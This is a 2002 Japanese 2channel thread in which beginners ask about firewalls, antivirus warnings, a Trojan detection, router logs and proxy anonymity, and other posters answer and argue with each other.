ファイヤーウォールソフトを導入した場合、WindowsXPのファイヤーウォール機能ははずすんですか?
399 :
名無しさん@お腹いっぱい。 :02/12/12 02:08
攻撃していて相手にこちらのIPが ばれたらファイアーウォールが あっても覗かれますか?
401 :
お願いします :02/12/12 03:10
すいません 本気でコマっています 教えて下さい 私いつもログインしないでログインした画面にそのまま行って ヤフオクを見てるのですが、今日見たらいきなりヤフオクのIDが、 「ura2ch2000」となっていたのです!! 凄くビックリして侵入されたのかな、って思ってテンパっています ログアウトしてもう一度いつものパスとIDでログインしたら元に戻った のですが、何か被害はあるでしょうか? 私はどうすればいいでしょうか? 裏2chのことでしょうか?すごく恐いです 助けてください お願いします
先日このスレを読んで、ZAを使っているのですが PCを起動する度にロックしたはずの鍵のマークが開いています 侵入されてるのでしょうか?対処法を教えて下さい。
Spybotも使っていますが問題はありません。
>>401 可能性の高いものから書きます。
(1)IDとパスワードを記憶していたクッキーの有効期限が切れた
通常は1ヶ月で切れるようです。
(2)イタズラ好きの友人・兄弟にパソコンをいじられた。
(3)誤作動
(4)あなたのパソコンへの侵入
(5)ヤフーのサーバーへの侵入
おそらく、(1)のクッキー期限切れだと思います。
ただ、クッキーの有効期限が来たとしてもあなたの他人のIDを 表示するのはヤフーのバグでしょう。ヤフーは利用者が非常に多いので セッションID使い回しにしてるんでしょうかね?
>>402 まあ、ZA側によれば404さんの言うように常時ロック使用は想定
してないそうで、少なくとも私の使ってる古いバージョン2.6は常時
使用できません。
そこで、Automatic lock をEnnableにして、Engage internet lock
after 1 minites of inactivety にしてます。こう設定すると実際上は
常時ロックとほぼ同じにできます。
408 :
名無しさん@お腹いっぱい。 :02/12/12 09:33
UDP:137がNetBIOS関係というのはわかるのですが TCP:40195って何でしょうか? 3箇所くらいからしきりにアクセスがあって不気味なんです
409 :
名無しさん@お腹いっぱい。 :02/12/12 09:43
>>409 ありがとうございます
これで安心できます
NIS2003を使っているのですが起動すると、毎回 権限のないプログラムによって一部のシマンテック製品の設定が変わりました。 これは攻撃者またはウイルスが保護を無効にしようとしたことを示す可能性があります。 問題を避けるために、設定が復帰されて以前の設定に戻り、システムが再起動します。 続行するには{OK}をクリックします。 という警告が出てしまいます。再起動してもまた同じ警告が出てしまうんですが どうすれば良いのでしょうか?
414 :
名無しさん@お腹いっぱい。 :02/12/12 16:18
416 :
名無しさん@お腹いっぱい。 :02/12/12 19:09
ノートン2002をいれているのですが、コンピューターを起動したとき赤いXマークがでて しばらく作動しません 前は最初から動いていた気がするのですが。。。 これはウイルスのしわざでしょうか? それとも勘違いでしょうか?
417 :
windy ◆xRcGF1SRQQ :02/12/12 19:15
>416 私も同じ状態なので気にしなくてもよいかと思われ
>>417 何の説得力も信頼性もない言葉だな
まぁこういうときは・・・
みんなー呼んでねー!
「「「でてこい藪先生ーーーー!!!」」」
薮のパソは脳豚入れれない旧型と思われ。
420 :
windy ◆xRcGF1SRQQ :02/12/12 19:51
スマソ
>>420 同じ人がいるということで安心しました
ありがと
423 :
名無しさん@お腹いっぱい。 :02/12/12 22:22
まえヤフーのアカウントが2chの人達に、ハックされたことあったけど、 今もヤフーのセキュリティはヤヴァイですか? 技術的にはハクろうと思えばハクれるって感じですか?
( ´ー`)oO(ハクろう?ハクれる?・・・。何語なんだろう?・・・最近変な人が増えたなぁ)
ら抜き言葉。
放置ね
>>426 レスありがとうございます。
ヤフーの人からっていうか、2chの人が何人か逮捕された事件があったと思うんですが、
要は、今もパスワードを比較的簡単にハッキングできる状態にあるのかどうか不安に思ってるんです。
パスワードがばれれば、登録されてる個人情報なんかも見られちゃうわけで、それが一番不安です。
どんなサイトも、個人情報入力する限り、絶対安全ということはないですが、
少なくともツールを使ってハッキングできるような状態だと、いやなんです。
自分で確かめるわけにもいかないので、識者の方からみてどうなんだろうと思い、質問した次第です。
アクリブ エックス 該当するページが見つかりませんでした Acrive X 約183件/検索にかかった時間0.33秒
Active X
>>428 2chから逮捕者が出たのは、ユーザ名からパスを推測してアタックしたもの。
簡単なパスだったので、割り出されただけです。
パスワードは複雑なものしておくといいです。
あれはネカフェでキーロガーしかけてパスワード盗んだんじゃなかったっけ?
>>428 パスワード管理がしっかりしてなくて、推測されて起きた。
クッキー漏れとかは一切関係ない初歩的なミス。
要するにユーザー側に負があったと。
>>431-434 レスありがとうございます。
そうだったんですか。安心しました。
今ヤフーでデッカイ懸賞やってるんで、ちゃんと住所書いて応募してみます。
ありがとうございました。
放置したいんだが笑いが止まらん。
>>426 の藪書き込みは笑いのネタが満載なんてもんじゃない。
おまい俺を笑い死にさせる気ですか。
>>435 =423
ついでにヤフーのアカウントにログインする時は
「標準」ではなく「セキュア(SSL)」モードで入るのをオススメしちゃう。
438 :
名無しさん@お腹いっぱい。 :02/12/13 00:30
ns1.ghostnet.ne.jp 210.248.99.178
439 :
名無しさん@お腹いっぱい。 :02/12/13 00:34
i031252.ap.plala.or.jp
>>428 以前2ちゃんねらの数人が逮捕されたとかいう件は、
Yahoo!オークションのIDとパスワードが漏れて、それを使ってヤフオクにログインした人達が不正アクセス
の嫌疑で取り調べを受けた、という事件ですね。
実際に逮捕されたんだったかどうだったかは記憶が定かじゃないですが。
上記の件はヤフオクのIDとパスワードが一緒だった、っていう初歩的なミスを突かれたもので、普通に
管理している分にはそう危険はないでしょう。
なおどっかの馬鹿が上記の件とYahoo!BBのセキュリティを混同してトンチンカンなことを言ってるよう
ですが無視してください。
>>440 >なおどっかの馬鹿が上記の件とYahoo!BBのセキュリティを混同して
>トンチンカンなことを言ってるようですが無視してください。
誰も混同なんかしてませんが。というか質問の意味がヤフーオークションの件を
意味してるとは思わなかっただけです。ヤフーBBとは関係ないですから。
尚、ヤフーオークションのID・パスワード流出・逮捕の件は
>>432 氏の御指摘の
とおりネットカフェでキーロガーをしこんで盗んだものですね。
445 :
2001年12月18日−不正にアクセスでネット詐欺、男性2人を逮捕 :02/12/13 09:56
>>423-443 http://auction.yahoo.co.jp/phtml/auc/jp/notice/instances08.html 2001年12月18日−不正にアクセスでネット詐欺、男性2人を逮捕
-------------------------------------------------------------
警視庁は、東京都世田谷区、無職男性(27)、東京都江戸川区、
無職男性(27)を詐欺などの疑いで逮捕した。 2人は2月、新宿区歌舞伎町の
漫画喫茶のパソコン約10台に、「キーロガー」(キーボードを押した順番を
記録するソフト)を勝手に組み込み、20人分のIDとパスワードを盗み、
これを使いネットオークションに不正にアクセスし、「ハイウェイカードを
安価で譲ります」と虚偽の掲示をして、17人から計約270万円をだまし取った
とみられている。
446 :
名無しさん@お腹いっぱい。 :02/12/13 09:59
粘着うざいぞ。
>>443 Yahoo!BBの局側のDSLAMはずいぶん前からNetBIOSをフィルタリングしてます。
共有設定がどうであれ他人の共有ファイルを覗けたりできないんですがねえ。
ウソばっかり書いて初心者を混乱させるのはいい加減にしてくれませんか。
450 :
名無しさん@お腹いっぱい。 :02/12/13 10:08
>>448 それじゃ、どうしてヤフーが共有設定を切るように呼びかけてるのかな〜?
粘着揚げ足取りもいい加減にしたら?
446を書いたのは漏れだが。
(;゚Д゚)
>>451 そのスレではもう激しくガイシュツなので誰も相手にしません。
426の書き込みは質問に対する回答にまるでなっていないのに、自作自演じゃない ならなんで「粘着止めろ」とか言って擁護するやつがいるのか理解不能。
( ´ー`)oO(おまいら、スルーだ、放置だ、透明あぼーんだぞ・・・。絶対に反応するな・・・)
458=459=ヴァカピーの自作自演
>>458 YBBについての必要事項の回答にはなってるよ。それで十分だろ。
はいはい、ご本人みずからのフォローご苦労様です
463 :
名無しさん@お腹いっぱい。 :02/12/13 17:22
ノートン製品版インストール(CDから)したいのですが、 「インストールする前にコンピューターを再起動して以前のアンインストールを完了する必要があります。 コンピューターを再起動してからインストーラを再び実行して下さい」 と出ます。 ノートン体験版を入れてあったのでアンインストールしました、再起動もしましたが何故か上記のコメントが出るんです。 何度も再起動してもこのコメントばっかなんです、どうしたらイイでしょうか?
467 :
名無しさん@お腹いっぱい。 :02/12/13 20:02
突然ですが、ゾーンアラームとノートンのファイアーウォールってどっちがセキュリティに関して強いのですか? 今はゾーンなんですが、思い切ってノートンでも買おうかなと思いたちましたが、 果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。 また、ノートンもゾーンみたいに誰々からいつ攻撃受けたとか表示することはできるのでしょうか? どなたか答えて下さい。お願いします。
>>467 >ゾーンアラームとノートンのファイアーウォールってどっちがセキュリティに関して強いのですか?
>果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。
どっちも性能的には変わりなし。
>また、ノートンもゾーンみたいに誰々からいつ攻撃受けたとか表示することはできるのでしょうか?
出来ますが、ポップアップは出ません。
>>467 純粋なファイヤーウォールとしてはゾーンアラームの方が優れてるという指摘
もあります。(もちろん、テストの仕方によっても違うでしょうけど)
http://www.geocities.jp/bruce_teller/security/leak.htm しかし、自宅サーバーを立てない一般人で純粋なファイヤーウォール機能を
比べて意味があるのかどうか疑問です。
それよりノートン2003のファイヤーウォールは個人情報保護機能やIDSも
あり、総合的には無料版のゾーンアラームよりセキュリティーは優れています。
(ただし、ゾーンアラームも有料版にはそういう機能もあるかもしれません。)
また、ファイヤーウォールだったかアンチウィルスだったかどっちか
知りませんがweb閲覧時の有害コンテンツからの保護機能もあり、危険サイト
閲覧についてはノートンに軍配が上がるかもしれません。
ただ、ノートン2003は相当重いそうですし、色々と他のソフトやインターネット
利用において障害が起きたりするかもしれません。
障害について詳しくはノートンスレで聞いてください。
471 :
名無しさん@お腹いっぱい。 :02/12/13 21:53
自分の「NETBIOSの名前」を知りたいのですが、どうしたら調べる事が 出来るでしょうか。 何方か教えて下さい。
>>471 DOSプロンプトで
nbtstat -n 1
って入力して実行してみ。
最初は、ズラズラ文字スクロールするけど1分ぐらいで止まるから。
止まるまで待たないと、正確な値出てこないから気を付けて。
ヒヒヒヒヒ
>>467 パーソナルユースで求められるPFWの機能としてなら469が言う通り
どちらも差は無い。ノートン(NIS、NPW)の場合PFWの機能以外にちょっとした
おまけ機能があるのだが、これは上手くつかいこなせないと初心者の場合
むしろ「なんじゃこりゃ」って事になる場合が多い。
>果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。
繰り返しになるがおかしな設定にしないかぎりどちらも同じように「ブロック」する。
ただゾーンアラームは無害な流れ弾でも「ブロックした」と騒ぐだけ。
(最新Verなら騒がないように設定もできるが)
ゾーンアラーム以外の多くのPFWはそういうゴミは無言ではじいている。
ノートンはZAほど騒がないが、だからと言ってブロックしていな訳じゃない。
で、本題。今ZA使ってるなら金出してノートン買う事もないよ。
ノートンのおまけ機能が欲しい場合でも、他のフリーのソフトで充分以上の
ものを揃えられる。
476 :
ななしさん :02/12/14 03:09
質問なんですけど、あるサイトの管理人をしているのですが一部有料でメンバーズエリアを設けているのですが 友人に「無料で見てやるよ」といわれて嘘だと思ったのですが、本当に見られてしまいました。 もちろんIDやパスワードは教えていません、1人1人IDとパスワードを変えているのにそんな事出来るんですか? その場合どうすれば防げるのですか?
わー、たったそれだけの情報で解決策まで要求するかこの人。
>>476 JavaScriptのようなもので入場制限をしているならだれでも破れる。
サーバの機能を借りた.htaccessを利用するようなタイプだと普通破れない。
つーかその友人のアクセスした形跡を見て手段の見当もつかんのか。
案外CGIでIDとパスワードをすり合わせるだけの認証だったりして。
そして「ひみつのフォルダ」のURLに飛ばすだけ。ディレクトリと言わないあたり鬱。
てなわけで
>>477 も言っとるが
IDとパスワードをどう使ってどうメンバーズエリアになってるのかわからんと話にならん。
あとクイズでもやってるんでなければとっとと友人に聞け。
192.168.0.1・・・
Σ( ̄▽ ̄;; ル...ルータの機能だったのか… スレよごしすまそ。
483 :
名無しさん@お腹いっぱい。 :02/12/14 07:54
484 :
DR.ドス :02/12/14 08:43
>>482 ルータかな?
コトによると、攻撃かもしれないね
この画面だけでは何も断定できないが・・・
>>464 教えて頂き有難うございます
なんとかインストできますた、2ちゃんがあってホントよかったです。
486 :
名無しさん@お腹いっぱい。 :02/12/14 23:37
前に誰かが、誰が書き込みしてるか暴いたという噂を聞いたのですが、 匿名掲示板なのに、そんなことできるんでしょうか? ただの嘘ですかね?
489 :
名無しさん@お腹いっぱい。 :02/12/14 23:40
>>486 カキコの中にどんなサイトを運営しているとか言う情報が入っていれば
わかることもあるよ。
でも基本的には管理者しかわからない。
491 :
名無しさん@お腹いっぱい。 :02/12/15 05:23
おすすめのインターネットセキュリティーソフト教えて
493 :
名無しさん@お腹いっぱい。 :02/12/15 06:01
そういえばさっき書き込む時に 画面が 書き込んでいいですか?っていう画面が頻発したが なぜだ?
494 :
名無しさん@お腹いっぱい。 :02/12/15 06:22
初心者でスマン
496 :
名無しさん@お腹いっぱい。 :02/12/15 06:37
Backdoor.Trojanというトロイに感染してしまったのですが ノートンで検疫したあと、誤って検疫ファイルごと消去してしまいました。 もうOSごと再インストールするしかないですか?
>>497 おれもそこ見ました。
そうなんですよ・・・消しちゃったから関連してるファイルが一切わからなくて・・
この辺を消しておけば確実っていうレジストリ値ってないですか? 一応バックアップは取りました
\Runと\RunServicesを全て消して再起動したら再構築されるんでしょうか? それが可能ならそうしたいと思います
>>498 全部消すのは止めとけ。
俺ノートン使いじゃないんだが、
ログに検出した結果は残って無い?
>>499 自分で見極められなければ晒してアドバイスを待つのもひとつの手かと。
あとOSの種類とノートンのVerを書いた方がいい。
最近、定期的に広告(オンラインカジノっぽい)が開いてたんですが 今回のウィルスとも関係あるんでしょうか? もうかれこれこの一連の問題で4時間余り苦悩しております・・・
505 :
名無しさん@お腹いっぱい。 :02/12/15 07:58
ログにはテキストしか残ってなかったです。 ファイル C:\My Documents\tool\haktek-j\haktek.exe は Backdoor.Trojan ウィルスに感染しています。 このファイルは検疫されました。
>>505 一応regeditでRun&RunServiceを覗いて
haktek.exeを参照するものが無いかチェックだ!
被害も今のところ
>>503 に書いたようにポップアップの
広告が開いていただけなんですけど、やっぱり不安なんで
ノートンは定期的にかけることにして、もし次回また見つかったら
そのときは今度こそレジストリ削除をして完全に安心という形にしておこうと思います
>>507 今確認してみました。無いようです。
少し前にも、もう一度ノートンかけたんですけどそのときも何も出ませんでした。
多分もう大丈夫そうです。ありがとうございました
>>496 >>509 念のため、電源を完全に切っといた方が良いですよ。
メモリに生き残ってたら復活する危険がありますから。
511 :
名無しさん@お腹いっぱい。 :02/12/15 09:15
ウィルスバスターにも引っかからなくて、疑問なんですが、 Thumbs.dbというデータベースファイルが作成されていて、 HPをアップするフォルダにいつも入っているんです。 削除は、FTPソフトで転送する時と、HDD検索して出てきたときで、 「隠しファイルを見る」で、見ようとしても見つからないんです。 ウィルスバスターに解析依頼を出しましたが、 ウィルスなし、の判定ですた。 なんか怖いんですけど、わかる人いますか? (スレ違いだったらごめんご)
2002/12/15 10:28:25 IP#2: rx filtered UDP from AAA/53 to 192.168.0.10/137 これはルータのLogなんですが、 AAAはプロバイダーのDNSサーバーIPアドレスです。 こちらのNetBIOSへ向けてアタックがイッパイあります。プロバやられてますか? それとも踏み台にされてる? Tikitikiマンセ〜!なんだけど・・・ 先日DNSサーバーを変更しろと案内されてからなんだけど。
2000やXPなら、TCP/IPのプロパティ→詳細設定→WINSタブで、NetBIOS over TCP/IPを無効にしれば、何とかならないのかなぁ、ひょっとして。 報告希望。
517 :
名無しさん@お腹いっぱい。 :02/12/15 11:21
>>512 ハズレ〜。ウィルスとは関係なし。
なんでもウィルスにしたがるんだな(w
>>519 そんなことはありませんよ、ただ、ANTIDOTEを薦めているだけでつ・・・
521 :
名無しさん@お腹いっぱい。 :02/12/15 13:03
522 :
薮パソユーザー ◆0fQkHdNop2 :02/12/15 13:10
>>521 実行してないなら気にスンナ
せっかくだからコレクションしとけ
524 :
名無しさん@お腹いっぱい。 :02/12/15 13:17
>474 自分は>467とは反対なんですが、 今NIS2002使ってて、FW以外の機能は使ってません。 NAVだけにして、FWは簡素なフリーものにしようと思っていますが、 どうでしょうか?
>>520 ヒント:WinXPサムネイル画像
あとは検索かけて調べよう > 特に薮
抜けてました。 ルーター使ってるし、ノートンのって、何かがちがちに固められてるような気がするんです。 あと、この部分だけ言えば、ZAはブロックした時に表示するのが良いと思うし、 Outpostはログが残るのが良いと思います。 (ノートンも残るけど、判別しにくそう)
528 :
薮パソユーザー ◆0fQkHdNop2 :02/12/15 14:04
529 :
名無しさん@お腹いっぱい。 :02/12/15 14:14
なんだ・・・、昨日で消えたかと思ったのに。
>>529 アンタの引用した所にもリブートで対処しろとなってるがな。
>対応方法:
>メモリ上のみで動作するプログラムであり、他のファイルへの感染活動は
>ありません。単純にマシンをリブートすればメモリがクリアされワームも
>なくなります。
>>525 OSはなにかいな?
それとノートンのPFW機能で特に気に入ってる部分が何かありますか?
533 :
名無しさん@お腹いっぱい。 :02/12/15 14:33
フリーメールに関する質問なんですけど、hotmailのパスワードは、 破るためのソフトがあって簡単に破られると、どこかのスレで聞きました。 という事は、ヤフーのフリーメールのパスワードも破られるということで しょうか? 2ちゃんにさらすためのフリーメールを探しているのですが・・・ 皆さんが高度な質問をされているところ、初歩的な質問ですみません。
534 :
名無しさん@お腹いっぱい。 :02/12/15 14:35
>>533 おまえ、今の状態を狙って聞いてるだろ?
首釣って死ね
あ、
>>513 に書いてあった。
ハズカシ〜&hears;
536 :
名無しさん@お腹いっぱい。 :02/12/15 14:43
(・∀・)ニヤニヤ
>>533 あほなパスワードでなければ、ヤフーで十分だよ。
そうでなかったら、ヤフオクでのパス破り事件が日常茶飯事になってしまう。
例の2ちゃんねらー逮捕事件はパスがあほだったからだね。
>532 OSはXPとWin98です。 ノートンのPFWで気に入っている部分って、特にないんです。 これが良いと聞いて2001を買い、XPで使えないって言うんで2002にしました。
539 :
名無しさん@お腹いっぱい。 :02/12/15 16:02
1ヶ月で4万回とかブロックするのって普通なの? ZoneAlarmなんですが
541 :
名無しさん@お腹いっぱい。 :02/12/15 16:11
542 :
名無しさん@お腹いっぱい。 :02/12/15 17:00
少しお伺いしたいのですが、WINDOWSの接続の所にダイヤルアップの見たことの無いIDとやたら長い数字が羅列していました。 ADSLとダイヤルアップの接続が両方とも繋がっている場合どっちで繋がるのですか? わかる方教えてください。宜しくお願い致します。
543 :
名無しさん@お腹いっぱい。 :02/12/15 17:12
すみません。ここに質問したらいいのか良く分からない のですが、添付ファイルのついていないメールが、ウィルス メールである事ってあるんでしょうか? 変な質問でごめんなさい。是非、教えて下さい。
>>538 そうですか。NISで充分とも思いますがフリーのPFWもそれぞれ持ち味が
あるので変えてみるのも良し。ではこの板で人気のフリーの4大PFWについて特徴を。
ZoneAlarm → 簡単、且つ堅い。重い(リソース消費大)。完全アンインストールが大変。
Outpost → まぁ簡単、軽い。多機能(おまけ機能がノートン並)
Sygate5 → 柔軟。重くはない。ログ充実。IDS機能有り。GUIかっこいい。
Kerio2.1.4 → とにかく軽い。設定次第で堅くも穴だらけにもなる。知識(慣れ)必要。
Outpostは日本語対応、それ以外も日本語化パッチが全てあり。
OSが98ならばZA以外のものを選ぼう。(NISより)軽くなった事が実感できる。
XPならリソースは気にしなくて良いからどれでもお好きなのを。
以下は私見。「とりあえず簡単なものを」というならZAがベスト。
でも525さんの文面から向上心のある方と勝手に推測、SygateかKerioに
チャレンジしてみてはどうでしょう?確かに知識が無いと初めは訳がわからない
だろうけど、なんとか使いこなそうとする過程で、セキュリティ確保に一番大事な
「知識」が身に付きます。慣れるとPFWのルール作りも楽しくなる、かな。
どれを選んでもユーザーインターフェースはノートンよりは良いので
変えてみて失敗、という事は無いと思う。
>>542 文章の意味が不明。もっと分かりやすく書いてくれ。
>>543 可能性としてはかなり低い。
連打でアンチスレをとめたいのですが 良い方法があったら教えてください。 よろしくお願いします
547 :
名無しさん@お腹いっぱい。 :02/12/15 17:25
>>545 ありがとうございました!!安心しました。
>>542 うー。
ADSL接続可能でなおかつ「普通の」56kモデムも回線に繋がってると解釈。
どっちも繋がる。
Windows標準と設定されているほうで普段は繋がるが、
「他の接続」が設定されていて機器(モデム)が適切に設定されてれば
その「他の接続」は有効。
たとえばQ2プロバイダ接続でギコギコ電話かけるやつはパソコンに電話線繋がってれば使用可能。
>>547 安心すんな。他人に聞かずウィルスチェッカに聞け。
見た目で判断できるほどの技量はないと見た。
550 :
薮パソユーザー ◆0fQkHdNop2 :02/12/15 18:17
>>542 >ADSLとダイヤルアップの接続が両方とも繋がっている場合
>どっちで繋がるのですか?
私はADSLとダイヤルアップの両方のプロバイダーがあり、両方の回線を
つなげてますが同時には使用できません。
同時に両方使えるとブラウザーが困るからでしょう。
「ダイヤルしない」「ネットワーク接続が存在しないときには、ダイヤル
する」「通常の接続でダイヤルする」の3つから選ばねばなりません。
>>543 添付ファイルがなければ厳密にはウィルスメールではないですが、回線が
つながっていればHTMLメールの場合にはウィルスの埋め込まれたHPに
飛ばされてセキュリティーホールを塞いでなければウィルスに感染する
場合もあります。
551 :
名無しさん@お腹いっぱい。 :02/12/15 18:31
今までFWソフトのみで繋いでいてセキュリティチェックサイトでは 全部Stealth!だったんですが、これにルーターを加えたらStealth! が4個に減ってしまいました。気にしないでも良いでつか?
>>551 何のポートがStealthじゃなくなったのか分からないので、判断できません。
>>551 気にしなくて良いでしょう。
ルーターがcloseと反応してるだけですから。
>>551 とりあえず、ステルスでは無くなったポートは何?
皆さん、色々とご教授有り難うございます。 545様、文章がわかりにくくて申し訳ありませんでした。 ADSLでの契約のはずが何故かダイヤルアップ接続のショートカットが増えていたのです。ダイヤルアップの接続先は海外の電話番号か何かでここに接続すれば国際電話料金の請求が来るのかと思うと怖くて・・・。 とりあえずダイヤルアップ接続は削除しときます。
>>551 大いに気にしてくれ。
ルータの設定がおかしいか安物かのどちらかですから。
>>556 もし請求が来たら国際電話の料金だけはQ2と違って払わなくてはいけないので、それだけは覚悟。
ADSLだけ使うのなら、56kモデムの回線を外しておくべき。
ADSL接続から国際電話に繋がることは無い。
StealthからClosedに降格したポートは 21,25,79,110,113,135,143,443,445です。ルータは NECのWB45RLです。ルーターなしのほうがセキュ面で 安全度が高いのでしょうか?
>>559 ステルスモードのあるルーターは高いし、ブロードバンド回線ではあまり意味が
ありません。(そのIPにユーザーがいる可能性が高いとわかってるから)
ルーターが応答してもclosedなら問題ないでしょう。
つまり、ステルスな内堀(パソコン内部のパーソナルファイヤーウォール)に
加えて、橋のある位置はわかってるけど防御できてる外堀(ルーター)が
追加されたのですから安全性はアップしてます。
>>559 なんか見えてるポート多すぎるよ。普通のルータなら、基本的にはステルスのはず。
設定で「pingに応答をする」とかにチェック入ってない?
>>556 どうしてもダイヤルアップもつけとくなら国際電話・Q2防止ソフトを
常駐させたらどうですか?(私は入れてないですけど)
http://www.emurasoft.com/jp/chintcal/index.php それから、全く知らないとかだまされてダイヤルされたのであれば犯罪
なので警察とかに行ってください。(カッコ悪いでしょうけど)
ただし、英語ででも意味がわからずOKしてたら支払い義務はあると
思います。
>>558 >ADSLだけ使うのなら、56kモデムの回線を外しておくべき。
セキュリティーを考えればそうすべきなのですけど、頻繁にADSLが
切れてつながらない場合にはダイヤルアップ回線もつなげてしまう
者もいるでしょう。(たとえば私みたいに)
↑質問の意味をまるで理解してない
564 :
名無しさん@お腹いっぱい。 :02/12/15 19:34
>>562 薮パソはキチガイだから。何も知らないくせに。
ファイアウォールをソフトの名前と思ってるやつと
同レベルだよ、きっと。ってゆうか絶対
>>531 coderedをメモリ常駐型と呼んでない事を示すために引用したんだよ。
>薮パソユーザー ◆0fQkHdNop2 氏 回答者のマナーとして 他人が回答している話に余計なレスをつけない。 他人の回答にケチをつけない。 質問と関係のない自分の都合を持ち出さない。 この位は守ること。
>>566 ヤブじゃないが
そんな事いってるとヤブのでたらめを叩けなくなる。
でたらめな回答は叩くべし。
>>566 ヤブじゃないが
そんな事いってるとヤブのでたらめを叩けなくなる。
でたらめな回答は叩くべし。
569 :
名無しさん@お腹いっぱい。 :02/12/15 20:15
VBS_REDLOF.Aというウィルスに感染したようです。 いちおうオンラインスキャンで削除できるファイルは削除しておきました。 これに感染すると、htmlファイルにも確実にウィルスが埋め込まれてしまうのでしょうか? 見た限りでは、それらしいものはなかったのですが…
571 :
名無しさん@お腹いっぱい。 :02/12/15 22:01
最近ノートン先生がこの手の警告を頻繁に出すようになりました。 高危険度となっているので遮断してますが、これってなんなんですか? 不安でたまりません。 21:40(2002/12/15)に次の通信を検出しました: プロトコル:TCP(インバウンド) リモートアドレス:61.74.223.25 :5000 ローカルアドレス: 自分のホスト: ms-sql-s(1433) リモートコンピュータがこのコンピュータとの接続を確立しようとしていま す。
572 :
名無しさん@お腹いっぱい。 :02/12/15 22:01
最近ノートン先生がこの手の警告を頻繁に出すようになりました。 高危険度となっているので遮断してますが、これってなんなんですか? 不安でたまりません。 21:40(2002/12/15)に次の通信を検出しました: プロトコル:TCP(インバウンド) リモートアドレス:61.74.223.25 :5000 ローカルアドレス: 自分のホスト: ms-sql-s(1433) リモートコンピュータがこのコンピュータとの接続を確立しようとしていま す。
>>571-572 Port1433は"Microsoft SQL Server"
SQL Serverってのを使ってなければ、ほぼどうでもいいと思われ
ABoneをバージョンうpしる! 話はそれからだ
576 :
名無しさん@お腹いっぱい。 :02/12/15 22:20
>>574 ありがとう
>>575 そういえば、バージョンアップ最近してなかった。
なんでわかるの?
>>576 二重カキコ=ABone ってことだろう・・・
578 :
名無しさん@お腹いっぱい。 :02/12/15 22:28
>>57 7
そうなんだ、早速バージョンアップしてきます。
ありがとうございます。
579 :
名無しさん@お腹いっぱい。 :02/12/16 04:06
助言を頂きたくてカキコいたします。 最近ヤフーのトップに行くと、自分ではクリックした覚えの無いトピックスが 訪問済みの色になっているのです。 最初は家族の誰かかな〜?と思っていたのですが、よく考えたら自分以外PCを使う者もおらず・・・ もしかして乗っ取りとかハッキングとかなのでしょうか? 未だにアナログ回線で、ISDNすら来ない田舎に住んでいるので、ネットをする時意外はモジュラージャックも抜いています。 オークションなどを利用するときは回線が弱すぎて画像の表示すら出来ない時があるので、串を通す場合もありますが、何か関係あるのでしょうか? PC内に仕事のデータ(お客様の住所等も・・・)が入っているのでとても心配です。 どなたかご意見いただけましたらと思います。
よくあること。
本当にどうしてもどうしても気になって仕方がない場合は (パーソナル)ファイアーウォールでも導入して「入ってくる」通信の内容を確かめてみ。
>>579 Yahooのトップのリンク先を見てみれば分かると思うけど
単にカテゴリ分けされたリンクが貼られてるだけだろ?
つまり以前に同じカテゴリのニュースをクリックしていれば
トピックスが変わっていたとしても訪問済みの色になるわけさ。
つまり
>>581 の言う通り「よくあること」なので気にしないに1票。
584 :
名無しさん@お腹いっぱい。 :02/12/16 05:07
>>512 さん
>>513 さん初心者の珍質問に答えていただいてありがとうございますた。
今まで、ずっと気になっていて、夜も寝れなかったんです。
だから昼間寝てますた(藁
ようやく夜寝れます。
ありがとう。
585 :
名無しさん@お腹いっぱい。 :02/12/16 05:40
Important Information: Annoymous Proxy Server は無料の
プロキシーサービスです。(当プロキシーを使用する為に、ご利用者の
ブラウザーの設定は一切必要ありません。)
このプロキシーサーバーは、アクセスされる如何なる
インターネットユーザーの個人情報、若しくはアクセスログも
保管いたしません。又、ユーザーのアクセス調査にも使用
しておりません。ご利用頂ける利点は、危険なACTIVEXプログラムや
ひつこいJAVAポップアップなどを排除し、快適に
インターネットサーフィンを楽しめる道具としてのサービスです。
http://pxy01.pink-banana.com/cgi-bin/redirect.cgi というのを見つけたんですけど本当に大丈夫ですかね?
削除依頼とかするとIPが出てしまうんで会社とかからだととかばれないように身元を隠したいんですけど
これ見るとログとってないようですし、ログ提示を要求とかされても提示出来ないということなんですよね
ただ、どこまで信用出来るかどうかというものはありますけど、どうでしょうか?
>>586 そんなにやばいすっか
削除依頼出すぐらいなんですが、ちなみにどんな情報とか
抜かれる可能性がありますかね。IPとか環境変数抜かれるぐらいなら
いいかなという気はするんですが、HDDの中身とか簡単に
抜かれるならまずいかも個人特定出来る情報とかあるんで
その辺よろしければ詳しい人教えてください
588 :
bloom :02/12/16 09:36
>>589 ありがとうございます。初心者なものでちょっと
>>586 の意味ありげな
書き込みで心配になってしまいました。
ただ、ログは本当はこっそりとってそうな気もしますね
じゃないとわざわざ無償でこんなものを提供してなさそうですものね
まあ、削除依頼で使うぐらいならたいしたことなさそうですが・・
>>585 メリットはなんだろうか
モニタリングかなやっぱり。。
まあ、ボランティアが主目的ではない罠、普通。
593 :
名無しさん@お腹いっぱい。 :02/12/16 11:53
Kerio 入れますた。で、一応確認したいんですけど | SERVICES.EXE | size=88848byte | CRC16=6A56 | CRC32=EAE9606F | MD5=e68ff41c8ce12461d2c8c18d383be645 で間違いないでしょか。win2k sp3 ie6.0 sp1 だす。 アンチウィルスソフトでチェックしてるし ダイジョブだろうとは思ってるんですけど いちおう。
つうか、削除依頼ぐらい生で出せ。人として
>>593 kerioスレで聞け、んで思うさま無視されるか叩かれるかしろ。
ったく初質スレで聞くなら使うなよ、kerioなんか
>>594 会社からだとやばいっす!
会社からでも、会社がばれずに削除依頼出せるように。。
>>596 自宅であるいは個人契約の回線経由でやるという選択肢はゼロか。
598 :
名無しさん@お腹いっぱい。 :02/12/16 14:30
>595 でも別にKerio固有の話じゃないし。。
>>585 そもそも、そのプロクシから削除依頼できないみたいですよ。
そのプロクシから↓の削除依頼したら、削除対象URL入力したのに
http://pc.2ch.net/test/read.cgi/sec/1039053088/568 >「削除対象アドレス」が入力されていません!
となって削除できませんでした。
それからそのサイトもしかしたらアングラ違法オーナーの可能性だけでなく、
警察とかアメリカ政府とか違法エロサイト摘発市民団体のものの可能性も
あるんじゃないのですか?どこからたどりつかれたのですか?
私も2chのトリップが盗まれたりしないかちょっと心配になってきましたが
違法な事をしたりパスワード入力しなければ大丈夫のような気がします。
